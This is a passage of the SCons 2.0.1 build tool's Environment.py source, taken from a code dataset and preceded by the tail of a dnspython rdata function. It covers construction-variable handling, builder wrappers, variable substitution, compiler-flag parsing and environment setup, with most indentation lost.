    @param current: The offset in wire of the beginning of the rdata.
@type current: int
@param rdlen: The length of the wire-format rdata
@type rdlen: int
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@rtype: dns.rdata.Rdata instance"""
cls = get_rdata_class(rdclass, rdtype)
return cls.from_wire(rdclass, rdtype, wire, current, rdlen, origin)
|
apache-2.0
|
nguyentran/openviber
|
tools/scons-local/scons-local-2.0.1/SCons/Environment.py
|
61
|
91318
|
"""SCons.Environment
Base class for construction Environments. These are
the primary objects used to communicate dependency and
construction information to the build engine.
Keyword arguments supplied when the construction Environment
is created are construction variables used to initialize the
Environment
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Environment.py 5134 2010/08/16 23:02:40 bdeegan"
import copy
import os
import sys
import re
import shlex
from collections import UserDict
import SCons.Action
import SCons.Builder
from SCons.Debug import logInstanceCreation
import SCons.Defaults
import SCons.Errors
import SCons.Memoize
import SCons.Node
import SCons.Node.Alias
import SCons.Node.FS
import SCons.Node.Python
import SCons.Platform
import SCons.SConf
import SCons.SConsign
import SCons.Subst
import SCons.Tool
import SCons.Util
import SCons.Warnings
class _Null(object):
pass
_null = _Null
_warn_copy_deprecated = True
_warn_source_signatures_deprecated = True
_warn_target_signatures_deprecated = True
CleanTargets = {}
CalculatorArgs = {}
semi_deepcopy = SCons.Util.semi_deepcopy
# Pull UserError into the global name space for the benefit of
# Environment().SourceSignatures(), which has some import statements
# which seem to mess up its ability to reference SCons directly.
UserError = SCons.Errors.UserError
def alias_builder(env, target, source):
pass
AliasBuilder = SCons.Builder.Builder(action = alias_builder,
target_factory = SCons.Node.Alias.default_ans.Alias,
source_factory = SCons.Node.FS.Entry,
multi = 1,
is_explicit = None,
name='AliasBuilder')
def apply_tools(env, tools, toolpath):
# Store the toolpath in the Environment.
if toolpath is not None:
env['toolpath'] = toolpath
if not tools:
return
# Filter out null tools from the list.
for tool in [_f for _f in tools if _f]:
if SCons.Util.is_List(tool) or isinstance(tool, tuple):
toolname = tool[0]
toolargs = tool[1] # should be a dict of kw args
tool = env.Tool(toolname, **toolargs)
else:
env.Tool(tool)
# These names are (or will be) controlled by SCons; users should never
# set or override them. This warning can optionally be turned off,
# but scons will still ignore the illegal variable names even if it's off.
reserved_construction_var_names = [
'CHANGED_SOURCES',
'CHANGED_TARGETS',
'SOURCE',
'SOURCES',
'TARGET',
'TARGETS',
'UNCHANGED_SOURCES',
'UNCHANGED_TARGETS',
]
future_reserved_construction_var_names = [
#'HOST_OS',
#'HOST_ARCH',
#'HOST_CPU',
]
def copy_non_reserved_keywords(dict):
result = semi_deepcopy(dict)
for k in result.keys():
if k in reserved_construction_var_names:
msg = "Ignoring attempt to set reserved variable `$%s'"
SCons.Warnings.warn(SCons.Warnings.ReservedVariableWarning, msg % k)
del result[k]
return result
def _set_reserved(env, key, value):
msg = "Ignoring attempt to set reserved variable `$%s'"
SCons.Warnings.warn(SCons.Warnings.ReservedVariableWarning, msg % key)
def _set_future_reserved(env, key, value):
env._dict[key] = value
msg = "`$%s' will be reserved in a future release and setting it will become ignored"
SCons.Warnings.warn(SCons.Warnings.FutureReservedVariableWarning, msg % key)
def _set_BUILDERS(env, key, value):
try:
bd = env._dict[key]
for k in bd.keys():
del bd[k]
except KeyError:
        bd = BuilderDict({}, env)
env._dict[key] = bd
for k, v in value.items():
if not SCons.Builder.is_a_Builder(v):
raise SCons.Errors.UserError('%s is not a Builder.' % repr(v))
bd.update(value)
def _del_SCANNERS(env, key):
del env._dict[key]
env.scanner_map_delete()
def _set_SCANNERS(env, key, value):
env._dict[key] = value
env.scanner_map_delete()
def _delete_duplicates(l, keep_last):
"""Delete duplicates from a sequence, keeping the first or last."""
seen={}
result=[]
if keep_last: # reverse in & out, then keep first
l.reverse()
for i in l:
try:
if i not in seen:
result.append(i)
seen[i]=1
except TypeError:
# probably unhashable. Just keep it.
result.append(i)
if keep_last:
result.reverse()
return result
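# For example, _delete_duplicates(['a', 'b', 'a', 'c'], keep_last=False)
# returns ['a', 'b', 'c'], while keep_last=True returns ['b', 'a', 'c']
# (keeping the last occurrence of each element).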
# The following is partly based on code in a comment added by Peter
# Shannon at the following page (there called the "transplant" class):
#
# ASPN : Python Cookbook : Dynamically added methods to a class
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/81732
#
# We had independently been using the idiom as BuilderWrapper, but
# factoring out the common parts into this base class, and making
# BuilderWrapper a subclass that overrides __call__() to enforce specific
# Builder calling conventions, simplified some of our higher-layer code.
class MethodWrapper(object):
"""
A generic Wrapper class that associates a method (which can
actually be any callable) with an object. As part of creating this
    MethodWrapper object an attribute with the specified name (by default,
the name of the supplied method) is added to the underlying object.
When that new "method" is called, our __call__() method adds the
object as the first argument, simulating the Python behavior of
supplying "self" on method calls.
We hang on to the name by which the method was added to the underlying
base class so that we can provide a method to "clone" ourselves onto
a new underlying object being copied (without which we wouldn't need
to save that info).
"""
def __init__(self, object, method, name=None):
if name is None:
name = method.__name__
self.object = object
self.method = method
self.name = name
setattr(self.object, name, self)
def __call__(self, *args, **kwargs):
nargs = (self.object,) + args
return self.method(*nargs, **kwargs)
def clone(self, new_object):
"""
Returns an object that re-binds the underlying "method" to
the specified new object.
"""
return self.__class__(new_object, self.method, self.name)
class BuilderWrapper(MethodWrapper):
"""
    A MethodWrapper subclass that associates an environment with
a Builder.
This mainly exists to wrap the __call__() function so that all calls
to Builders can have their argument lists massaged in the same way
(treat a lone argument as the source, treat two arguments as target
then source, make sure both target and source are lists) without
having to have cut-and-paste code to do it.
As a bit of obsessive backwards compatibility, we also intercept
attempts to get or set the "env" or "builder" attributes, which were
the names we used before we put the common functionality into the
MethodWrapper base class. We'll keep this around for a while in case
people shipped Tool modules that reached into the wrapper (like the
    Tool/qt.py module does, or did). There shouldn't be a lot of attribute
fetching or setting on these, so a little extra work shouldn't hurt.
"""
def __call__(self, target=None, source=_null, *args, **kw):
if source is _null:
source = target
target = None
if target is not None and not SCons.Util.is_List(target):
target = [target]
if source is not None and not SCons.Util.is_List(source):
source = [source]
return MethodWrapper.__call__(self, target, source, *args, **kw)
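    # For example, a one-argument call such as env.SomeBuilder('main.c') is
    # treated as source-only, i.e. the same as
    # env.SomeBuilder(target=None, source=['main.c']), while a two-argument
    # call env.SomeBuilder('prog', 'main.c') supplies target then source
    # (SomeBuilder here is a hypothetical builder name).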
def __repr__(self):
return '<BuilderWrapper %s>' % repr(self.name)
def __str__(self):
return self.__repr__()
def __getattr__(self, name):
if name == 'env':
return self.object
elif name == 'builder':
return self.method
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == 'env':
self.object = value
elif name == 'builder':
self.method = value
else:
self.__dict__[name] = value
# This allows a Builder to be executed directly
# through the Environment to which it's attached.
# In practice, we shouldn't need this, because
# builders actually get executed through a Node.
# But we do have a unit test for this, and can't
# yet rule out that it would be useful in the
# future, so leave it for now.
#def execute(self, **kw):
# kw['env'] = self.env
# self.builder.execute(**kw)
class BuilderDict(UserDict):
"""This is a dictionary-like class used by an Environment to hold
the Builders. We need to do this because every time someone changes
the Builders in the Environment's BUILDERS dictionary, we must
update the Environment's attributes."""
def __init__(self, dict, env):
# Set self.env before calling the superclass initialization,
# because it will end up calling our other methods, which will
# need to point the values in this dictionary to self.env.
self.env = env
UserDict.__init__(self, dict)
def __semi_deepcopy__(self):
return self.__class__(self.data, self.env)
def __setitem__(self, item, val):
try:
method = getattr(self.env, item).method
except AttributeError:
pass
else:
self.env.RemoveMethod(method)
UserDict.__setitem__(self, item, val)
BuilderWrapper(self.env, val, item)
def __delitem__(self, item):
UserDict.__delitem__(self, item)
delattr(self.env, item)
def update(self, dict):
for i, v in dict.items():
self.__setitem__(i, v)
_is_valid_var = re.compile(r'[_a-zA-Z]\w*$')
def is_valid_construction_var(varstr):
    """Return whether the specified string is a legitimate construction
variable.
"""
return _is_valid_var.match(varstr)
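# For example, is_valid_construction_var('CCFLAGS') and
# is_valid_construction_var('_private1') both match, while
# is_valid_construction_var('2BAD') and is_valid_construction_var('A-B')
# return None, since names must start with a letter or underscore and
# contain only word characters.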
class SubstitutionEnvironment(object):
"""Base class for different flavors of construction environments.
    This class contains a minimal set of methods that handle construction
variable expansion and conversion of strings to Nodes, which may or
may not be actually useful as a stand-alone class. Which methods
ended up in this class is pretty arbitrary right now. They're
basically the ones which we've empirically determined are common to
the different construction environment subclasses, and most of the
others that use or touch the underlying dictionary of construction
variables.
Eventually, this class should contain all the methods that we
determine are necessary for a "minimal" interface to the build engine.
A full "native Python" SCons environment has gotten pretty heavyweight
with all of the methods and Tools and construction variables we've
jammed in there, so it would be nice to have a lighter weight
alternative for interfaces that don't need all of the bells and
whistles. (At some point, we'll also probably rename this class
"Base," since that more reflects what we want this class to become,
but because we've released comments that tell people to subclass
Environment.Base to create their own flavors of construction
environment, we'll save that for a future refactoring when this
class actually becomes useful.)
"""
if SCons.Memoize.use_memoizer:
__metaclass__ = SCons.Memoize.Memoized_Metaclass
def __init__(self, **kw):
"""Initialization of an underlying SubstitutionEnvironment class.
"""
if __debug__: logInstanceCreation(self, 'Environment.SubstitutionEnvironment')
self.fs = SCons.Node.FS.get_default_fs()
self.ans = SCons.Node.Alias.default_ans
self.lookup_list = SCons.Node.arg2nodes_lookups
self._dict = kw.copy()
self._init_special()
self.added_methods = []
#self._memo = {}
    def _init_special(self):
        """Initialize the dispatch tables for special handling of
        special construction variables."""
self._special_del = {}
self._special_del['SCANNERS'] = _del_SCANNERS
self._special_set = {}
for key in reserved_construction_var_names:
self._special_set[key] = _set_reserved
for key in future_reserved_construction_var_names:
self._special_set[key] = _set_future_reserved
self._special_set['BUILDERS'] = _set_BUILDERS
self._special_set['SCANNERS'] = _set_SCANNERS
# Freeze the keys of self._special_set in a list for use by
# methods that need to check. (Empirically, list scanning has
# gotten better than dict.has_key() in Python 2.5.)
self._special_set_keys = list(self._special_set.keys())
def __cmp__(self, other):
return cmp(self._dict, other._dict)
def __delitem__(self, key):
special = self._special_del.get(key)
if special:
special(self, key)
else:
del self._dict[key]
def __getitem__(self, key):
return self._dict[key]
def __setitem__(self, key, value):
# This is heavily used. This implementation is the best we have
# according to the timings in bench/env.__setitem__.py.
#
# The "key in self._special_set_keys" test here seems to perform
# pretty well for the number of keys we have. A hard-coded
# list works a little better in Python 2.5, but that has the
# disadvantage of maybe getting out of sync if we ever add more
# variable names. Using self._special_set.has_key() works a
# little better in Python 2.4, but is worse than this test.
# So right now it seems like a good trade-off, but feel free to
# revisit this with bench/env.__setitem__.py as needed (and
# as newer versions of Python come out).
if key in self._special_set_keys:
self._special_set[key](self, key, value)
else:
# If we already have the entry, then it's obviously a valid
# key and we don't need to check. If we do check, using a
# global, pre-compiled regular expression directly is more
# efficient than calling another function or a method.
if key not in self._dict \
and not _is_valid_var.match(key):
raise SCons.Errors.UserError("Illegal construction variable `%s'" % key)
self._dict[key] = value
def get(self, key, default=None):
"""Emulates the get() method of dictionaries."""
return self._dict.get(key, default)
def has_key(self, key):
return key in self._dict
def __contains__(self, key):
return self._dict.__contains__(key)
def items(self):
return list(self._dict.items())
def arg2nodes(self, args, node_factory=_null, lookup_list=_null, **kw):
if node_factory is _null:
node_factory = self.fs.File
if lookup_list is _null:
lookup_list = self.lookup_list
if not args:
return []
args = SCons.Util.flatten(args)
nodes = []
for v in args:
if SCons.Util.is_String(v):
n = None
for l in lookup_list:
n = l(v)
if n is not None:
break
if n is not None:
if SCons.Util.is_String(n):
# n = self.subst(n, raw=1, **kw)
kw['raw'] = 1
n = self.subst(n, **kw)
if node_factory:
n = node_factory(n)
if SCons.Util.is_List(n):
nodes.extend(n)
else:
nodes.append(n)
elif node_factory:
# v = node_factory(self.subst(v, raw=1, **kw))
kw['raw'] = 1
v = node_factory(self.subst(v, **kw))
if SCons.Util.is_List(v):
nodes.extend(v)
else:
nodes.append(v)
else:
nodes.append(v)
return nodes
def gvars(self):
return self._dict
def lvars(self):
return {}
def subst(self, string, raw=0, target=None, source=None, conv=None, executor=None):
"""Recursively interpolates construction variables from the
Environment into the specified string, returning the expanded
result. Construction variables are specified by a $ prefix
in the string and begin with an initial underscore or
alphabetic character followed by any number of underscores
or alphanumeric characters. The construction variable names
may be surrounded by curly braces to separate the name from
trailing characters.
"""
gvars = self.gvars()
lvars = self.lvars()
lvars['__env__'] = self
if executor:
lvars.update(executor.get_lvars())
return SCons.Subst.scons_subst(string, self, raw, target, source, gvars, lvars, conv)
def subst_kw(self, kw, raw=0, target=None, source=None):
nkw = {}
for k, v in kw.items():
k = self.subst(k, raw, target, source)
if SCons.Util.is_String(v):
v = self.subst(v, raw, target, source)
nkw[k] = v
return nkw
def subst_list(self, string, raw=0, target=None, source=None, conv=None, executor=None):
"""Calls through to SCons.Subst.scons_subst_list(). See
the documentation for that function."""
gvars = self.gvars()
lvars = self.lvars()
lvars['__env__'] = self
if executor:
lvars.update(executor.get_lvars())
return SCons.Subst.scons_subst_list(string, self, raw, target, source, gvars, lvars, conv)
def subst_path(self, path, target=None, source=None):
"""Substitute a path list, turning EntryProxies into Nodes
and leaving Nodes (and other objects) as-is."""
if not SCons.Util.is_List(path):
path = [path]
def s(obj):
"""This is the "string conversion" routine that we have our
substitutions use to return Nodes, not strings. This relies
on the fact that an EntryProxy object has a get() method that
returns the underlying Node that it wraps, which is a bit of
architectural dependence that we might need to break or modify
in the future in response to additional requirements."""
try:
get = obj.get
except AttributeError:
obj = SCons.Util.to_String_for_subst(obj)
else:
obj = get()
return obj
r = []
for p in path:
if SCons.Util.is_String(p):
p = self.subst(p, target=target, source=source, conv=s)
if SCons.Util.is_List(p):
if len(p) == 1:
p = p[0]
else:
# We have an object plus a string, or multiple
# objects that we need to smush together. No choice
# but to make them into a string.
p = ''.join(map(SCons.Util.to_String_for_subst, p))
else:
p = s(p)
r.append(p)
return r
subst_target_source = subst
def backtick(self, command):
import subprocess
# common arguments
kw = { 'stdin' : 'devnull',
'stdout' : subprocess.PIPE,
'stderr' : subprocess.PIPE,
'universal_newlines' : True,
}
# if the command is a list, assume it's been quoted
        # otherwise force a shell
if not SCons.Util.is_List(command): kw['shell'] = True
# run constructed command
p = SCons.Action._subproc(self, command, **kw)
out,err = p.communicate()
status = p.wait()
if err:
sys.stderr.write(unicode(err))
if status:
raise OSError("'%s' exited %d" % (command, status))
return out
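    # For example, env.backtick('pkg-config --cflags libpng') (a hypothetical
    # command) runs the command, returns its stdout as a string, writes any
    # stderr output to sys.stderr, and raises OSError on a non-zero exit
    # status.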
def AddMethod(self, function, name=None):
"""
Adds the specified function as a method of this construction
environment with the specified name. If the name is omitted,
the default name is the name of the function itself.
"""
method = MethodWrapper(self, function, name)
self.added_methods.append(method)
def RemoveMethod(self, function):
"""
Removes the specified function's MethodWrapper from the
added_methods list, so we don't re-bind it when making a clone.
"""
self.added_methods = [dm for dm in self.added_methods if not dm.method is function]
def Override(self, overrides):
"""
        Produce a modified environment whose variables are overridden by
        the overrides dictionary. "overrides" is a dictionary that
will override the variables of this environment.
This function is much more efficient than Clone() or creating
a new Environment because it doesn't copy the construction
environment dictionary, it just wraps the underlying construction
environment, and doesn't even create a wrapper object if there
are no overrides.
"""
if not overrides: return self
o = copy_non_reserved_keywords(overrides)
if not o: return self
overrides = {}
merges = None
for key, value in o.items():
if key == 'parse_flags':
merges = value
else:
overrides[key] = SCons.Subst.scons_subst_once(value, self, key)
env = OverrideEnvironment(self, overrides)
if merges: env.MergeFlags(merges)
return env
def ParseFlags(self, *flags):
"""
Parse the set of flags and return a dict with the flags placed
in the appropriate entry. The flags are treated as a typical
set of command-line flags for a GNU-like toolchain and used to
populate the entries in the dict immediately below. If one of
the flag strings begins with a bang (exclamation mark), it is
assumed to be a command and the rest of the string is executed;
the result of that evaluation is then added to the dict.
"""
dict = {
'ASFLAGS' : SCons.Util.CLVar(''),
'CFLAGS' : SCons.Util.CLVar(''),
'CCFLAGS' : SCons.Util.CLVar(''),
'CPPDEFINES' : [],
'CPPFLAGS' : SCons.Util.CLVar(''),
'CPPPATH' : [],
'FRAMEWORKPATH' : SCons.Util.CLVar(''),
'FRAMEWORKS' : SCons.Util.CLVar(''),
'LIBPATH' : [],
'LIBS' : [],
'LINKFLAGS' : SCons.Util.CLVar(''),
'RPATH' : [],
}
def do_parse(arg):
# if arg is a sequence, recurse with each element
if not arg:
return
if not SCons.Util.is_String(arg):
for t in arg: do_parse(t)
return
# if arg is a command, execute it
if arg[0] == '!':
arg = self.backtick(arg[1:])
# utility function to deal with -D option
def append_define(name, dict = dict):
t = name.split('=')
if len(t) == 1:
dict['CPPDEFINES'].append(name)
else:
dict['CPPDEFINES'].append([t[0], '='.join(t[1:])])
# Loop through the flags and add them to the appropriate option.
# This tries to strike a balance between checking for all possible
# flags and keeping the logic to a finite size, so it doesn't
            # check for some that don't occur often. In particular, if the
# flag is not known to occur in a config script and there's a way
# of passing the flag to the right place (by wrapping it in a -W
# flag, for example) we don't check for it. Note that most
# preprocessor options are not handled, since unhandled options
# are placed in CCFLAGS, so unless the preprocessor is invoked
# separately, these flags will still get to the preprocessor.
# Other options not currently handled:
            # -iquote dir (preprocessor search path)
# -u symbol (linker undefined symbol)
# -s (linker strip files)
# -static* (linker static binding)
# -shared* (linker dynamic binding)
# -symbolic (linker global binding)
# -R dir (deprecated linker rpath)
# IBM compilers may also accept -qframeworkdir=foo
params = shlex.split(arg)
append_next_arg_to = None # for multi-word args
for arg in params:
if append_next_arg_to:
if append_next_arg_to == 'CPPDEFINES':
append_define(arg)
elif append_next_arg_to == '-include':
t = ('-include', self.fs.File(arg))
dict['CCFLAGS'].append(t)
elif append_next_arg_to == '-isysroot':
t = ('-isysroot', arg)
dict['CCFLAGS'].append(t)
dict['LINKFLAGS'].append(t)
elif append_next_arg_to == '-arch':
t = ('-arch', arg)
dict['CCFLAGS'].append(t)
dict['LINKFLAGS'].append(t)
else:
dict[append_next_arg_to].append(arg)
append_next_arg_to = None
elif not arg[0] in ['-', '+']:
dict['LIBS'].append(self.fs.File(arg))
elif arg[:2] == '-L':
if arg[2:]:
dict['LIBPATH'].append(arg[2:])
else:
append_next_arg_to = 'LIBPATH'
elif arg[:2] == '-l':
if arg[2:]:
dict['LIBS'].append(arg[2:])
else:
append_next_arg_to = 'LIBS'
elif arg[:2] == '-I':
if arg[2:]:
dict['CPPPATH'].append(arg[2:])
else:
append_next_arg_to = 'CPPPATH'
elif arg[:4] == '-Wa,':
dict['ASFLAGS'].append(arg[4:])
dict['CCFLAGS'].append(arg)
elif arg[:4] == '-Wl,':
if arg[:11] == '-Wl,-rpath=':
dict['RPATH'].append(arg[11:])
elif arg[:7] == '-Wl,-R,':
dict['RPATH'].append(arg[7:])
elif arg[:6] == '-Wl,-R':
dict['RPATH'].append(arg[6:])
else:
dict['LINKFLAGS'].append(arg)
elif arg[:4] == '-Wp,':
dict['CPPFLAGS'].append(arg)
elif arg[:2] == '-D':
if arg[2:]:
append_define(arg[2:])
else:
append_next_arg_to = 'CPPDEFINES'
elif arg == '-framework':
append_next_arg_to = 'FRAMEWORKS'
elif arg[:14] == '-frameworkdir=':
dict['FRAMEWORKPATH'].append(arg[14:])
elif arg[:2] == '-F':
if arg[2:]:
dict['FRAMEWORKPATH'].append(arg[2:])
else:
append_next_arg_to = 'FRAMEWORKPATH'
elif arg == '-mno-cygwin':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg == '-mwindows':
dict['LINKFLAGS'].append(arg)
elif arg == '-pthread':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg[:5] == '-std=':
dict['CFLAGS'].append(arg) # C only
elif arg[0] == '+':
dict['CCFLAGS'].append(arg)
dict['LINKFLAGS'].append(arg)
elif arg in ['-include', '-isysroot', '-arch']:
append_next_arg_to = arg
else:
dict['CCFLAGS'].append(arg)
for arg in flags:
do_parse(arg)
return dict
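    # For example (hypothetical flags),
    #     env.ParseFlags('-I/usr/include -DFOO=1 -lm -pthread')
    # returns a dict in which, among the other keys above,
    #     CPPPATH    contains '/usr/include'
    #     CPPDEFINES contains ['FOO', '1']
    #     LIBS       contains 'm'
    #     CCFLAGS and LINKFLAGS both contain '-pthread'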
def MergeFlags(self, args, unique=1, dict=None):
"""
Merge the dict in args into the construction variables of this
env, or the passed-in dict. If args is not a dict, it is
converted into a dict using ParseFlags. If unique is not set,
the flags are appended rather than merged.
"""
if dict is None:
dict = self
if not SCons.Util.is_Dict(args):
args = self.ParseFlags(args)
if not unique:
self.Append(**args)
return self
for key, value in args.items():
if not value:
continue
try:
orig = self[key]
except KeyError:
orig = value
else:
if not orig:
orig = value
elif value:
# Add orig and value. The logic here was lifted from
# part of env.Append() (see there for a lot of comments
# about the order in which things are tried) and is
# used mainly to handle coercion of strings to CLVar to
# "do the right thing" given (e.g.) an original CCFLAGS
# string variable like '-pipe -Wall'.
try:
orig = orig + value
except (KeyError, TypeError):
try:
add_to_orig = orig.append
except AttributeError:
value.insert(0, orig)
orig = value
else:
add_to_orig(value)
t = []
if key[-4:] == 'PATH':
                ### keep left-most occurrence
for v in orig:
if v not in t:
t.append(v)
else:
                ### keep right-most occurrence
orig.reverse()
for v in orig:
if v not in t:
t.insert(0, v)
self[key] = t
return self
# def MergeShellPaths(self, args, prepend=1):
# """
# Merge the dict in args into the shell environment in env['ENV'].
# Shell path elements are appended or prepended according to prepend.
# Uses Pre/AppendENVPath, so it always appends or prepends uniquely.
# Example: env.MergeShellPaths({'LIBPATH': '/usr/local/lib'})
# prepends /usr/local/lib to env['ENV']['LIBPATH'].
# """
# for pathname, pathval in args.items():
# if not pathval:
# continue
# if prepend:
# self.PrependENVPath(pathname, pathval)
# else:
# self.AppendENVPath(pathname, pathval)
def default_decide_source(dependency, target, prev_ni):
f = SCons.Defaults.DefaultEnvironment().decide_source
return f(dependency, target, prev_ni)
def default_decide_target(dependency, target, prev_ni):
f = SCons.Defaults.DefaultEnvironment().decide_target
return f(dependency, target, prev_ni)
def default_copy_from_cache(src, dst):
f = SCons.Defaults.DefaultEnvironment().copy_from_cache
return f(src, dst)
class Base(SubstitutionEnvironment):
"""Base class for "real" construction Environments. These are the
primary objects used to communicate dependency and construction
information to the build engine.
Keyword arguments supplied when the construction Environment
is created are construction variables used to initialize the
Environment.
"""
memoizer_counters = []
#######################################################################
# This is THE class for interacting with the SCons build engine,
# and it contains a lot of stuff, so we're going to try to keep this
# a little organized by grouping the methods.
#######################################################################
#######################################################################
# Methods that make an Environment act like a dictionary. These have
# the expected standard names for Python mapping objects. Note that
# we don't actually make an Environment a subclass of UserDict for
# performance reasons. Note also that we only supply methods for
# dictionary functionality that we actually need and use.
#######################################################################
def __init__(self,
platform=None,
tools=None,
toolpath=None,
variables=None,
parse_flags = None,
**kw):
"""
Initialization of a basic SCons construction environment,
including setting up special construction variables like BUILDER,
PLATFORM, etc., and searching for and applying available Tools.
Note that we do *not* call the underlying base class
        (SubstitutionEnvironment) initialization, because we need to
initialize things in a very specific order that doesn't work
with the much simpler base class initialization.
"""
if __debug__: logInstanceCreation(self, 'Environment.Base')
self._memo = {}
self.fs = SCons.Node.FS.get_default_fs()
self.ans = SCons.Node.Alias.default_ans
self.lookup_list = SCons.Node.arg2nodes_lookups
self._dict = semi_deepcopy(SCons.Defaults.ConstructionEnvironment)
self._init_special()
self.added_methods = []
# We don't use AddMethod, or define these as methods in this
# class, because we *don't* want these functions to be bound
# methods. They need to operate independently so that the
# settings will work properly regardless of whether a given
# target ends up being built with a Base environment or an
# OverrideEnvironment or what have you.
self.decide_target = default_decide_target
self.decide_source = default_decide_source
self.copy_from_cache = default_copy_from_cache
self._dict['BUILDERS'] = BuilderDict(self._dict['BUILDERS'], self)
if platform is None:
platform = self._dict.get('PLATFORM', None)
if platform is None:
platform = SCons.Platform.Platform()
if SCons.Util.is_String(platform):
platform = SCons.Platform.Platform(platform)
self._dict['PLATFORM'] = str(platform)
platform(self)
self._dict['HOST_OS'] = self._dict.get('HOST_OS',None)
self._dict['HOST_ARCH'] = self._dict.get('HOST_ARCH',None)
# Now set defaults for TARGET_{OS|ARCH}
self._dict['TARGET_OS'] = self._dict.get('HOST_OS',None)
self._dict['TARGET_ARCH'] = self._dict.get('HOST_ARCH',None)
# Apply the passed-in and customizable variables to the
# environment before calling the tools, because they may use
# some of them during initialization.
if 'options' in kw:
            # Backwards compatibility: they may still be using the
# old "options" keyword.
variables = kw['options']
del kw['options']
self.Replace(**kw)
keys = list(kw.keys())
if variables:
keys = keys + list(variables.keys())
variables.Update(self)
save = {}
for k in keys:
try:
save[k] = self._dict[k]
except KeyError:
# No value may have been set if they tried to pass in a
# reserved variable name like TARGETS.
pass
SCons.Tool.Initializers(self)
if tools is None:
tools = self._dict.get('TOOLS', None)
if tools is None:
tools = ['default']
apply_tools(self, tools, toolpath)
# Now restore the passed-in and customized variables
# to the environment, since the values the user set explicitly
# should override any values set by the tools.
for key, val in save.items():
self._dict[key] = val
# Finally, apply any flags to be merged in
if parse_flags: self.MergeFlags(parse_flags)
#######################################################################
# Utility methods that are primarily for internal use by SCons.
# These begin with lower-case letters.
#######################################################################
def get_builder(self, name):
"""Fetch the builder with the specified name from the environment.
"""
try:
return self._dict['BUILDERS'][name]
except KeyError:
return None
def get_CacheDir(self):
try:
path = self._CacheDir_path
except AttributeError:
path = SCons.Defaults.DefaultEnvironment()._CacheDir_path
try:
if path == self._last_CacheDir_path:
return self._last_CacheDir
except AttributeError:
pass
cd = SCons.CacheDir.CacheDir(path)
self._last_CacheDir_path = path
self._last_CacheDir = cd
return cd
def get_factory(self, factory, default='File'):
"""Return a factory function for creating Nodes for this
construction environment.
"""
name = default
try:
is_node = issubclass(factory, SCons.Node.FS.Base)
except TypeError:
# The specified factory isn't a Node itself--it's
# most likely None, or possibly a callable.
pass
else:
if is_node:
# The specified factory is a Node (sub)class. Try to
# return the FS method that corresponds to the Node's
# name--that is, we return self.fs.Dir if they want a Dir,
# self.fs.File for a File, etc.
try: name = factory.__name__
except AttributeError: pass
else: factory = None
if not factory:
# They passed us None, or we picked up a name from a specified
# class, so return the FS method. (Note that we *don't*
# use our own self.{Dir,File} methods because that would
# cause env.subst() to be called twice on the file name,
# interfering with files that have $$ in them.)
factory = getattr(self.fs, name)
return factory
memoizer_counters.append(SCons.Memoize.CountValue('_gsm'))
def _gsm(self):
try:
return self._memo['_gsm']
except KeyError:
pass
result = {}
try:
scanners = self._dict['SCANNERS']
except KeyError:
pass
else:
# Reverse the scanner list so that, if multiple scanners
# claim they can scan the same suffix, earlier scanners
# in the list will overwrite later scanners, so that
# the result looks like a "first match" to the user.
if not SCons.Util.is_List(scanners):
scanners = [scanners]
else:
scanners = scanners[:] # copy so reverse() doesn't mod original
scanners.reverse()
for scanner in scanners:
for k in scanner.get_skeys(self):
if k and self['PLATFORM'] == 'win32':
k = k.lower()
result[k] = scanner
self._memo['_gsm'] = result
return result
def get_scanner(self, skey):
"""Find the appropriate scanner given a key (usually a file suffix).
"""
if skey and self['PLATFORM'] == 'win32':
skey = skey.lower()
return self._gsm().get(skey)
def scanner_map_delete(self, kw=None):
"""Delete the cached scanner map (if we need to).
"""
try:
del self._memo['_gsm']
except KeyError:
pass
def _update(self, dict):
"""Update an environment's values directly, bypassing the normal
checks that occur when users try to set items.
"""
self._dict.update(dict)
def get_src_sig_type(self):
try:
return self.src_sig_type
except AttributeError:
t = SCons.Defaults.DefaultEnvironment().src_sig_type
self.src_sig_type = t
return t
def get_tgt_sig_type(self):
try:
return self.tgt_sig_type
except AttributeError:
t = SCons.Defaults.DefaultEnvironment().tgt_sig_type
self.tgt_sig_type = t
return t
#######################################################################
# Public methods for manipulating an Environment. These begin with
# upper-case letters. The essential characteristic of methods in
# this section is that they do *not* have corresponding same-named
# global functions. For example, a stand-alone Append() function
# makes no sense, because Append() is all about appending values to
# an Environment's construction variables.
#######################################################################
def Append(self, **kw):
"""Append values to existing construction variables
in an Environment.
"""
kw = copy_non_reserved_keywords(kw)
for key, val in kw.items():
# It would be easier on the eyes to write this using
# "continue" statements whenever we finish processing an item,
# but Python 1.5.2 apparently doesn't let you use "continue"
# within try:-except: blocks, so we have to nest our code.
try:
orig = self._dict[key]
except KeyError:
# No existing variable in the environment, so just set
# it to the new value.
self._dict[key] = val
else:
try:
# Check if the original looks like a dictionary.
# If it is, we can't just try adding the value because
# dictionaries don't have __add__() methods, and
# things like UserList will incorrectly coerce the
# original dict to a list (which we don't want).
update_dict = orig.update
except AttributeError:
try:
# Most straightforward: just try to add them
# together. This will work in most cases, when the
# original and new values are of compatible types.
self._dict[key] = orig + val
except (KeyError, TypeError):
try:
# Check if the original is a list.
add_to_orig = orig.append
